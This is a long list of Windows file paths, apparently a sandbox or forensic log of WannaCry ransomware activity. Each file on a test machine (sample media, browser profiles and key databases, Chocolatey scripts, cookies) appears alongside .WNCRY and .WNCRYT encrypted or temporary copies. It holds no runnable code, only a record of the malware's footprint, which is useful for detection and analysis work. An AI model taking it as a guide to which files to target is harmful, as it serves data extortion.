C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRY
C:\Users\Public\Music\Sample Music\Kalimba.mp3
C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRY
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRY
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRY
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRYT
C:\Users\user\AppData\Local\IconCache.db.WNCRY
C:\Users\user\AppData\Local\IconCache.db
C:\Users\user\AppData\Local\IconCache.db.WNCRYT
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRY
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db.WNCRY
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db.WNCRY
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js.WNCRY
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js.WNCRYT
C:\Users\All Users\Boxstarter\BoxStarter.bat.WNCRY
C:\Users\All Users\Boxstarter\BoxStarter.bat
C:\Users\All Users\Boxstarter\BoxStarter.bat.WNCRYT
C:\Users\All Users\Boxstarter\NOTICE.txt.WNCRY
C:\Users\All Users\Boxstarter\NOTICE.txt
C:\Users\All Users\Boxstarter\NOTICE.txt.WNCRYT
C:\Users\All Users\Boxstarter\VERIFICATION.txt.WNCRY
C:\Users\All Users\Boxstarter\VERIFICATION.txt
C:\Users\All Users\Boxstarter\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\LICENSE.txt
C:\Users\All Users\chocolatey\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat.WNCRY
C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat
C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat.WNCRYT
C:\Users\All Users\chocolatey\bin\_processed.txt.WNCRY
C:\Users\All Users\chocolatey\bin\_processed.txt
C:\Users\All Users\chocolatey\bin\_processed.txt.WNCRYT
C:\Users\All Users\chocolatey\config\chocolatey.config.backup.WNCRY
C:\Users\All Users\chocolatey\config\chocolatey.config.backup
C:\Users\All Users\chocolatey\config\chocolatey.config.backup.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1
C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1
C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\tools\checksum.license.txt.WNCRY
C:\Users\All Users\chocolatey\tools\checksum.license.txt
C:\Users\All Users\chocolatey\tools\checksum.license.txt.WNCRYT
C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRY
C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt.WNCRY
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd
C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt.WNCRY
